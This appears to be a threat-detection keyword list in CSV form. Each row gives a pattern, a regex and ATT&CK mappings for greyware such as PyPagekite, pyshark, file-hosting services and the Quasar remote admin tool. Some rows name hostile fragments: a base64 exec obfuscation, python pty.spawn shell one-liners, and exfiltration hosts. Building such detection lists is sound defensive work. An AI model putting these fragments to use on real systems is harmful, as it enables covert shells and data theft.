"*/pagekite-0.5.8a.py*",".{0,1000}\/pagekite\-0\.5\.8a\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*/pagekite-gtk.py*",".{0,1000}\/pagekite\-gtk\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*/pagekite-tmp.py*",".{0,1000}\/pagekite\-tmp\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*/PyPagekite.git*",".{0,1000}\/PyPagekite\.git.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*/PyPagekite/tarball/*",".{0,1000}\/PyPagekite\/tarball\/.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*/PyPagekite/zipball/*",".{0,1000}\/PyPagekite\/zipball\/.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*/var/log/pagekite/*",".{0,1000}\/var\/log\/pagekite\/.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*/var/run/pagekite.pid*",".{0,1000}\/var\/run\/pagekite\.pid.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*[PageKite] Remote connection closed!*",".{0,1000}\[PageKite\]\sRemote\sconnection\sclosed!.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*\pagekite.cfg*",".{0,1000}\\pagekite\.cfg.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*\pagekite.py*",".{0,1000}\\pagekite\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*\pagekite-gtk.py*",".{0,1000}\\pagekite\-gtk\.py.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*23e8d0a95d5769ea14e4fd5eac6b5c111ce538e61b18492c21482afd015170eb*",".{0,1000}23e8d0a95d5769ea14e4fd5eac6b5c111ce538e61b18492c21482afd015170eb.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","#filehash","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*7270581d315cffb125f9ac64ebcb6622959c8e9f779b8a07808fd6929b0e746a*",".{0,1000}7270581d315cffb125f9ac64ebcb6622959c8e9f779b8a07808fd6929b0e746a.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","#filehash","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*7dc50c28dc7c2fa9a6ea80df35c06bd649b17ae86d333e88b3bf242ac5690c98*",".{0,1000}7dc50c28dc7c2fa9a6ea80df35c06bd649b17ae86d333e88b3bf242ac5690c98.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","#filehash","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*b01db099512e344df190ee405619399c835b1d5522e2e6faa8e47b49418bab66*",".{0,1000}b01db099512e344df190ee405619399c835b1d5522e2e6faa8e47b49418bab66.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","#filehash","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*be8fc36ec0082bdb7d20a21ae7098899529bc9b9f6439b1496ca634395598d8a*",".{0,1000}be8fc36ec0082bdb7d20a21ae7098899529bc9b9f6439b1496ca634395598d8a.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","#filehash","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*bre@pagekite.net*",".{0,1000}bre\@pagekite\.net.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","#email","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*c4ec5f4d04c44b7a1c8cf813435dbc66a541b450bbaca4d70ded985d6518e76a*",".{0,1000}c4ec5f4d04c44b7a1c8cf813435dbc66a541b450bbaca4d70ded985d6518e76a.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","#filehash","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*f16d1b7d69bf4c2a9a7e737809dd930012f419e7b7977887226f0f6859367cc4*",".{0,1000}f16d1b7d69bf4c2a9a7e737809dd930012f419e7b7977887226f0f6859367cc4.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","#filehash","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*f2fd6676dba233df558278e6be42cd4c50a78a9c3f879db87acfc96607f41331*",".{0,1000}f2fd6676dba233df558278e6be42cd4c50a78a9c3f879db87acfc96607f41331.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","#filehash","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*http://*.pagekite.me*",".{0,1000}http\:\/\/.{0,1000}\.pagekite\.me.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*http://up.pagekite.net/*",".{0,1000}http\:\/\/up\.pagekite\.net\/.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*https://*.pagekite.me*",".{0,1000}https\:\/\/.{0,1000}\.pagekite\.me.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*https://pagekite.net/downloads/*",".{0,1000}https\:\/\/pagekite\.net\/downloads\/.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*https://pagekite.net/pk/src/*",".{0,1000}https\:\/\/pagekite\.net\/pk\/src\/.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*kitename.pagekite.me*",".{0,1000}kitename\.pagekite\.me.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*pagekite.httpd*",".{0,1000}pagekite\.httpd.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*pagekite.py /*",".{0,1000}pagekite\.py\s\/.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*pagekite.py 443 https://*",".{0,1000}pagekite\.py\s443\shttps\:\/\/.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*pagekite.py 80 http://*",".{0,1000}pagekite\.py\s80\shttp\:\/\/.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*pagekite.py --add *",".{0,1000}pagekite\.py\s\-\-add\s.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*pagekite.py localhost:*",".{0,1000}pagekite\.py\slocalhost\:.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*pagekite/PyPagekite*",".{0,1000}pagekite\/PyPagekite.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*/pyshark.git*",".{0,1000}\/pyshark\.git.{0,1000}","greyware_tool_keyword","pyshark","Python wrapper for tshark allowing python packet parsing using wireshark dissectors","T1040 - T1213 - T1105 - T1572","TA0009 - TA0007","N/A","N/A","Discovery","https://github.com/KimiNewt/pyshark","1","1","N/A","N/A","6","10","2197","421","2024-08-10T06:39:53Z","2013-12-28T14:38:22Z"
"*\pyshark\src\*",".{0,1000}\\pyshark\\src\\.{0,1000}","greyware_tool_keyword","pyshark","Python wrapper for tshark allowing python packet parsing using wireshark dissectors","T1040 - T1213 - T1105 - T1572","TA0009 - TA0007","N/A","N/A","Discovery","https://github.com/KimiNewt/pyshark","1","0","N/A","N/A","6","10","2197","421","2024-08-10T06:39:53Z","2013-12-28T14:38:22Z"
"*import pyshark*",".{0,1000}import\spyshark.{0,1000}","greyware_tool_keyword","pyshark","Python wrapper for tshark allowing python packet parsing using wireshark dissectors","T1040 - T1213 - T1105 - T1572","TA0009 - TA0007","N/A","N/A","Discovery","https://github.com/KimiNewt/pyshark","1","0","N/A","N/A","6","10","2197","421","2024-08-10T06:39:53Z","2013-12-28T14:38:22Z"
"*KimiNewt/pyshark*",".{0,1000}KimiNewt\/pyshark.{0,1000}","greyware_tool_keyword","pyshark","Python wrapper for tshark allowing python packet parsing using wireshark dissectors","T1040 - T1213 - T1105 - T1572","TA0009 - TA0007","N/A","N/A","Discovery","https://github.com/KimiNewt/pyshark","1","1","N/A","N/A","6","10","2197","421","2024-08-10T06:39:53Z","2013-12-28T14:38:22Z"
"*pip install pyshark*",".{0,1000}pip\sinstall\spyshark.{0,1000}","greyware_tool_keyword","pyshark","Python wrapper for tshark allowing python packet parsing using wireshark dissectors","T1040 - T1213 - T1105 - T1572","TA0009 - TA0007","N/A","N/A","Discovery","https://github.com/KimiNewt/pyshark","1","0","N/A","N/A","6","10","2197","421","2024-08-10T06:39:53Z","2013-12-28T14:38:22Z"
"*pyshark.FileCapture(*",".{0,1000}pyshark\.FileCapture\(.{0,1000}","greyware_tool_keyword","pyshark","Python wrapper for tshark allowing python packet parsing using wireshark dissectors","T1040 - T1213 - T1105 - T1572","TA0009 - TA0007","N/A","N/A","Discovery","https://github.com/KimiNewt/pyshark","1","0","N/A","N/A","6","10","2197","421","2024-08-10T06:39:53Z","2013-12-28T14:38:22Z"
"*pyshark.LiveCapture(*",".{0,1000}pyshark\.LiveCapture\(.{0,1000}","greyware_tool_keyword","pyshark","Python wrapper for tshark allowing python packet parsing using wireshark dissectors","T1040 - T1213 - T1105 - T1572","TA0009 - TA0007","N/A","N/A","Discovery","https://github.com/KimiNewt/pyshark","1","0","N/A","N/A","6","10","2197","421","2024-08-10T06:39:53Z","2013-12-28T14:38:22Z"
"*pyshark.RemoteCapture(*",".{0,1000}pyshark\.RemoteCapture\(.{0,1000}","greyware_tool_keyword","pyshark","Python wrapper for tshark allowing python packet parsing using wireshark dissectors","T1040 - T1213 - T1105 - T1572","TA0009 - TA0007","N/A","N/A","Discovery","https://github.com/KimiNewt/pyshark","1","0","N/A","N/A","6","10","2197","421","2024-08-10T06:39:53Z","2013-12-28T14:38:22Z"
"* ,exec(__import__('base64').b64decode(""*",".{0,1000}\s,exec\(__import__\(\'base64\'\)\.b64decode\(\"".{0,1000}","greyware_tool_keyword","python","suspicious way of exeuting code","T1059","TA0005","pytoileur","N/A","Defense Evasion","https://x.com/Ax_Sharma/status/1795813203500322953/photo/4","1","0","N/A","Cool package campaign","8","10","N/A","N/A","N/A","N/A"
"* -c 'import pty;pty.spawn(""/bin/bash*",".{0,1000}\s\-c\s\'import\spty\;pty\.spawn\(\""\/bin\/bash.{0,1000}","greyware_tool_keyword","python","interactive shell","T1059","TA0002 - TA0011","N/A","N/A","C2","N/A","1","0","N/A","greyware_tools high risks of false positives","6","10","N/A","N/A","N/A","N/A"
"* -c 'import pty;pty.spawn(""/bin/sh*",".{0,1000}\s\-c\s\'import\spty\;pty\.spawn\(\""\/bin\/sh.{0,1000}","greyware_tool_keyword","python","interactive shell","T1059","TA0002 - TA0011","N/A","N/A","C2","N/A","1","0","N/A","greyware_tools high risks of false positives","6","10","N/A","N/A","N/A","N/A"
"* -c 'import pty;pty.spawn(\""/bin/sh*",".{0,1000}\s\-c\s\'import\spty\;pty\.spawn\(\\\""\/bin\/sh.{0,1000}","greyware_tool_keyword","python","interactive shell","T1059","TA0002 - TA0011","N/A","N/A","C2","N/A","1","0","N/A","greyware_tools high risks of false positives","6","4","N/A","N/A","N/A","N/A"
"*https://qaz.im/*",".{0,1000}https\:\/\/qaz\.im\/.{0,1000}","greyware_tool_keyword","qaz.im","temporary file hosting service - abused by attackers to share informations with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Avos","Data Exfiltration","https://qaz.im/","1","1","N/A","uploading files url","10","10","N/A","N/A","N/A","N/A"
"*https://qaz.im/load/*",".{0,1000}https\:\/\/qaz\.im\/load\/.{0,1000}","greyware_tool_keyword","qaz.im","temporary file hosting service - abused by attackers to share informations with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Avos","Collection","https://qaz.im/","1","1","N/A","downloading files url","10","10","N/A","N/A","N/A","N/A"
"*https://qaz.im/zaq/*",".{0,1000}https\:\/\/qaz\.im\/zaq\/.{0,1000}","greyware_tool_keyword","qaz.im","temporary file hosting service - abused by attackers to share informations with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Avos","Collection","https://qaz.im/","1","1","N/A","downloading notes url","10","10","N/A","N/A","N/A","N/A"
"*https://qaz.is/*",".{0,1000}https\:\/\/qaz\.is\/.{0,1000}","greyware_tool_keyword","qaz.is","temporary file hosting service - abused by attackers to share informations with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Avos","Data Exfiltration","https://qaz.is/","1","1","N/A","uploading files url","10","10","N/A","N/A","N/A","N/A"
"*https://qaz.is/load/*",".{0,1000}https\:\/\/qaz\.is\/load\/.{0,1000}","greyware_tool_keyword","qaz.is","temporary file hosting service - abused by attackers to share informations with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Avos","Collection","https://qaz.is/","1","1","N/A","downloading files url","10","10","N/A","N/A","N/A","N/A"
"*https://qaz.is/zaq/*",".{0,1000}https\:\/\/qaz\.is\/zaq\/.{0,1000}","greyware_tool_keyword","qaz.is","temporary file hosting service - abused by attackers to share informations with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Avos","Collection","https://qaz.is/","1","1","N/A","downloading notes url","10","10","N/A","N/A","N/A","N/A"
"*https://qaz.su*",".{0,1000}https\:\/\/qaz\.su.{0,1000}","greyware_tool_keyword","qaz.su","temporary file hosting service - abused by attackers to share informations with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Avos","Data Exfiltration","https://qaz.su/","1","1","N/A","uploading files url","10","10","N/A","N/A","N/A","N/A"
"*https://qaz.su/load/*",".{0,1000}https\:\/\/qaz\.su\/load\/.{0,1000}","greyware_tool_keyword","qaz.su","temporary file hosting service - abused by attackers to share informations with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Avos","Collection","https://qaz.su/","1","1","N/A","downloading files url","10","10","N/A","N/A","N/A","N/A"
"*https://qaz.su/zaq/*",".{0,1000}https\:\/\/qaz\.su\/zaq\/.{0,1000}","greyware_tool_keyword","qaz.su","temporary file hosting service - abused by attackers to share informations with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Avos","Collection","https://qaz.su/","1","1","N/A","downloading notes url","10","10","N/A","N/A","N/A","N/A"
"*https://qu.ax/*.*","https\:\/\/qu\.ax\/[^\s\n]+","greyware_tool_keyword","qu.ax","qu.ax is a quick and private file hosting service - abused by threat actors","T1560.001 - T1190 - T1102 - T1027.002","TA0001 - TA0005 - TA0042","N/A","N/A","Collection","https://qu[.]ax/","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"* CN=Quasar Server CA*",".{0,1000}\sCN\=Quasar\sServer\sCA.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*/Quasar.git*",".{0,1000}\/Quasar\.git.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","1","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*/Quasar.v*.zip*",".{0,1000}\/Quasar\.v.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","1","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*/Quasar/releases*",".{0,1000}\/Quasar\/releases.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","1","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*\appdata\roaming\*'DestPort'>4782</Data>*",".{0,1000}\\appdata\\roaming\\.{0,1000}\'DestPort\'\>4782\<\/Data\>.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*\CurrentVersion\Run\Quasar Client Startup*",".{0,1000}\\CurrentVersion\\Run\\Quasar\sClient\sStartup.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*\Prefetch\QUASAR.EXE*",".{0,1000}\\Prefetch\\QUASAR\.EXE.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*\Program Files\SubDir\Client.exe*",".{0,1000}\\Program\sFiles\\SubDir\\Client\.exe.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*\Quasar.Client\*",".{0,1000}\\Quasar\.Client\\.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
